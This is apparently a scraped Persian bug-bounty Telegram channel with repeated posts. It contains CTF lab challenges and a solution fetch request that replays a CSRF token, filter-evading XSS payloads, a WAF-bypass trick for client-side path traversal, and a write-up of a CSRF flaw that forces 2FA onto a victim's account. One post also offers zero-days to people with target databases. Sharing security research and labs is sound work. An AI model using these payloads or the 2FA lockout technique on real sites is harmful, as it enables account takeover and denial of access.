چند ماهی هست که نمیتونم درست حسابی فعالیت کنم
برای همین بوده دیگه مقاله نذاشتم و خودمم زیاد نخوندم😅
تصمیم گرفتم دوباره برگردم
و هرروز هانت کنم
دوباره هرچی بخونم شیر میکنم باهاتون
برای همین بوده دیگه مقاله نذاشتم و خودمم زیاد نخوندم😅
تصمیم گرفتم دوباره برگردم
و هرروز هانت کنم
دوباره هرچی بخونم شیر میکنم باهاتون
❤16👍3
لینکدینتونو چطوری اکتیو کردید دوباره؟
ریسترکشن خوردم و میگه باید id verify کنی
ریسترکشن خوردم و میگه باید id verify کنی
❤3
چه عددی آلرت میشه؟
```
x=[(3,4,5,1,2),alert]; x[1].bind(top)([3,5,4,2,1][x[0]]) ```
```
x=[(3,4,5,1,2),alert]; x[1].bind(top)([3,5,4,2,1][x[0]]) ```
Anonymous Quiz
28%
1
4%
2
29%
3
29%
4
9%
5
🔥4❤2👍1
🆘 رفقا اینو میتونید حل کنید:
https://lab.jsecurity.ir/lab2/
راه حل های خلاقانه تون رو میخوام بزارم توی هفته نامه Jsecurity .
داستانش اینه که CSRF توی کلوژر گیرکرده، و شما بایستی اونو بدست بیارید و درخواست بزنید به /update و فلگ رو توی صفحه چاپ کنید.
یه پارامتر q داره که به xss آسیب پذیره.
اپدیت: برای دیدن فلگ هم میتونید پاسخ اینو ببینید
https://lab.jsecurity.ir/lab2/
راه حل های خلاقانه تون رو میخوام بزارم توی هفته نامه Jsecurity .
داستانش اینه که CSRF توی کلوژر گیرکرده، و شما بایستی اونو بدست بیارید و درخواست بزنید به /update و فلگ رو توی صفحه چاپ کنید.
یه پارامتر q داره که به xss آسیب پذیره.
اپدیت: برای دیدن فلگ هم میتونید پاسخ اینو ببینید
await fetch("https://lab.jsecurity.ir/lab2/update", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"body": "_csrf=5yuyw85r-R_--IWCQfIFOE68dIE6QWdhrUWg&data=pwned",
"method": "POST",
"mode": "cors"
});❤9
Another XSS Payload:
https://x.com/hoseinshurabi/status/1960794897465926038
{document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>')https://x.com/hoseinshurabi/status/1960794897465926038
🔥14
BugBounty & Hacking Resources
🆘 رفقا اینو میتونید حل کنید: https://lab.jsecurity.ir/lab2/ راه حل های خلاقانه تون رو میخوام بزارم توی هفته نامه Jsecurity . داستانش اینه که CSRF توی کلوژر گیرکرده، و شما بایستی اونو بدست بیارید و درخواست بزنید به /update و فلگ رو توی صفحه چاپ کنید. یه…
این eval, atob, hash هم فیلتر کردم
خیلی کلکین 😄
باز ببینم چه ایده ایی میرسه به ذهنتون.😎
خیلی کلکین 😄
باز ببینم چه ایده ایی میرسه به ذهنتون.😎
❤2🤣1
Another XSS payload 😂
https://x.com/hoseinshurabi/status/1961085469216645322
{_=new Set()}{_[Symbol.iterator]=confirm.bind(null,'Catfather is here: '+navigation.currentEntry.url)}[_]=_
https://x.com/hoseinshurabi/status/1961085469216645322
🔥10 1
https://x.com/xssdoctor/status/1961157661048578402?s=46
cspt waf bypass
key part:
cspt waf bypass
key part:
However, as mentioned on ctbbpodcast, fetch will REMOVE a tab (%09) from the url. So if you enter target.com/123456%5c.%09.…, the js will often url decode, then remove the tab and normalize \ to / and requests api.target.com/api/v1/whatever. If you repeat the pattern, you can often get down to the api root
X (formerly Twitter)
xssdoctor (@xssdoctor) on X
Found a great waf bypass for client side path traversal (a thread)
❤6
https://x.com/hoseinshurabi/status/1963639674838081947
خبر خوب برای بچه های هفته نامه، من امروز با
آدام صحبت کردم و به کامیونتی فارسی زبان محبت داشتن و قرار شد بین کسانی که لابراتوری مرتبط به هفته ۷ رو حل کنند قرعه کشی کنیم و به یک نفر از طرف @hackinghub_io دوره Hands-On Web Exploitation جایزه بدیم.
خبر خوب برای بچه های هفته نامه، من امروز با
آدام صحبت کردم و به کامیونتی فارسی زبان محبت داشتن و قرار شد بین کسانی که لابراتوری مرتبط به هفته ۷ رو حل کنند قرعه کشی کنیم و به یک نفر از طرف @hackinghub_io دوره Hands-On Web Exploitation جایزه بدیم.
❤18👍2
گایز چند تا Zeroday دارم
اگه دیتابیس خوبی از تارگتا دارید @meydi7
بیاید پیوی
شامل url باشه یا اینکه ریسپانس / سایتو داشته باشید و بتونید سرچ کنید
اگه دیتابیس خوبی از تارگتا دارید @meydi7
بیاید پیوی
شامل url باشه یا اینکه ریسپانس / سایتو داشته باشید و بتونید سرچ کنید
🤯6🔥4❤2
مقاله زیرو کلیک ato من:
https://mey-d.github.io/posts/zero-click-ato-persian/
امیدوارم لذت ببرید
https://x.com/neotrony/status/1964141250686169414
https://mey-d.github.io/posts/zero-click-ato-persian/
امیدوارم لذت ببرید
https://x.com/neotrony/status/1964141250686169414
X (formerly Twitter)
mehdi parandin (@neotrony) on X
اولین مقاله م به فارسی. توضیح یکی از باگ هام:
Zero Click ATO
فلو یا تریک خاصی نیس. صرفا ریکانه و درک اپلیکیشن
امیدوارم خوشتون بیاد
https://t.co/Nm2GbOh1DC
Zero Click ATO
فلو یا تریک خاصی نیس. صرفا ریکانه و درک اپلیکیشن
امیدوارم خوشتون بیاد
https://t.co/Nm2GbOh1DC
❤19 6🔥3
https://memoryleaks.ir/dns-rebinding-schrodingers-response/
اینو یادم رفت براتون بذارم. حتما بخونیدش
https://x.com/_indexe/status/1914649037665357911?s=46
اینو یادم رفت براتون بذارم. حتما بخونیدش
https://x.com/_indexe/status/1914649037665357911?s=46
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
DNS Rebinding: Schrödinger’s Response
در نتیجه راه حل ما برای بدست آوردن مقدار GUID قربانی، rebinding DNS هست. الگوهای متنوعی برای انجام rebinding DNS وجود داره.
❤7 1
رفقا این چالش هفته هفتم رو فرصت داشتین حل کنید:
https://lab.jsecurity.ir/lab4/
هدف اینه که فلگ رو فعال کنید. پاپ آپ نکنید. فعال کنید 😉
https://lab.jsecurity.ir/lab4/
هدف اینه که فلگ رو فعال کنید. پاپ آپ نکنید. فعال کنید 😉
🔥6
Forwarded from GO-TO CVE (| | Sharo K h | |)
امشب با بچه ها یه لایو هانت کوچیک رفتیم رو یه پروگرم پرایوت که خارج از پلتفرم ها بود
همینجوری بعد اینکه لاگین کردیم دیدیم تارگت کوکی بیسد هستش بعد دیدیم برای درخواست های post هیچ csrf token ای هم نداره ولی فقط بادی درخواست application/json هستش
تست کیس های اینم که میدونیم اول از همه من کلن هدر content-type رو حذف کردم و بهم ارور داد بعدش به text/plain تبدیل کردم باز ارور داد
ولی موقعی که به application/x-www-form-urlencoded تبدیلش کردیم دیدیم قبول میکنه و تمام
رو همه درخواست های post این تارگت ما آسیب پذیری csrf داشتیم
حالا رفتیم ببینیم چطوری اکسپلویت کنیم
چینج ایمیل نمیشد, چینج پسورد و هیچی دیگه نداشت یا هم با متود PUT میخورد
رفتیم یکم js خوندیم و همه اندپوینت های api اونجا وجود داشتن, سرچ کردیم فقط اونای که post قبول میکنن رو دراوردیم بعد فهمیدیم تنها راه اکسپلویت این باگ اینه که بیایم به اندپوینت two_factor درخواست پست بزنیم و دوتا پارامتر میگرفت
حالا این یعنی چی
یعنی اینکه اتکر میتونه otp_secret رو از اکانت خودش برداره و 2FA اکانت قربانی رو فعال کنه
خیلی جالب شد نشستیم یه کد پایتون هم نوشتیم که میاد از کتابخونه pyotp استفاده میکنه و از اون otp_secret هر ۶۰ ثانیه یه کد میده بهمون
ماهم اومدیم با flask یه کد زدیم که اگه قربانی بازش کرد از طرف اون یه درخواست POST بره به اون اندپوینت و 2fa اکانتش فعال بشه و دیگه نتونه به اکانتش دسترسی داشته باشه
اها یه نکته دیگه درمورد باگ CSRF اینه که اگه هدر Accept رو هم تارگت بخواد, باز هم میشه آسیب پذیری csrf رو اکسپلویت کرد چون هنوز درخواست simple باقی میمونه, مثلا توی این تارگت نیاز بود اینو ست کنیم:
که اینو میشه با fetch هندل کرد
همینجوری بعد اینکه لاگین کردیم دیدیم تارگت کوکی بیسد هستش بعد دیدیم برای درخواست های post هیچ csrf token ای هم نداره ولی فقط بادی درخواست application/json هستش
تست کیس های اینم که میدونیم اول از همه من کلن هدر content-type رو حذف کردم و بهم ارور داد بعدش به text/plain تبدیل کردم باز ارور داد
ولی موقعی که به application/x-www-form-urlencoded تبدیلش کردیم دیدیم قبول میکنه و تمام
رو همه درخواست های post این تارگت ما آسیب پذیری csrf داشتیم
حالا رفتیم ببینیم چطوری اکسپلویت کنیم
چینج ایمیل نمیشد, چینج پسورد و هیچی دیگه نداشت یا هم با متود PUT میخورد
رفتیم یکم js خوندیم و همه اندپوینت های api اونجا وجود داشتن, سرچ کردیم فقط اونای که post قبول میکنن رو دراوردیم بعد فهمیدیم تنها راه اکسپلویت این باگ اینه که بیایم به اندپوینت two_factor درخواست پست بزنیم و دوتا پارامتر میگرفت
authentication_code -> 60 second otp code
otp_secret -> otp secret which obtain authentication code from this
حالا این یعنی چی
یعنی اینکه اتکر میتونه otp_secret رو از اکانت خودش برداره و 2FA اکانت قربانی رو فعال کنه
خیلی جالب شد نشستیم یه کد پایتون هم نوشتیم که میاد از کتابخونه pyotp استفاده میکنه و از اون otp_secret هر ۶۰ ثانیه یه کد میده بهمون
ماهم اومدیم با flask یه کد زدیم که اگه قربانی بازش کرد از طرف اون یه درخواست POST بره به اون اندپوینت و 2fa اکانتش فعال بشه و دیگه نتونه به اکانتش دسترسی داشته باشه
اها یه نکته دیگه درمورد باگ CSRF اینه که اگه هدر Accept رو هم تارگت بخواد, باز هم میشه آسیب پذیری csrf رو اکسپلویت کرد چون هنوز درخواست simple باقی میمونه, مثلا توی این تارگت نیاز بود اینو ست کنیم:
Accept: application/vnd.s.v1+json
که اینو میشه با fetch هندل کرد
👏16❤5👍2🔥2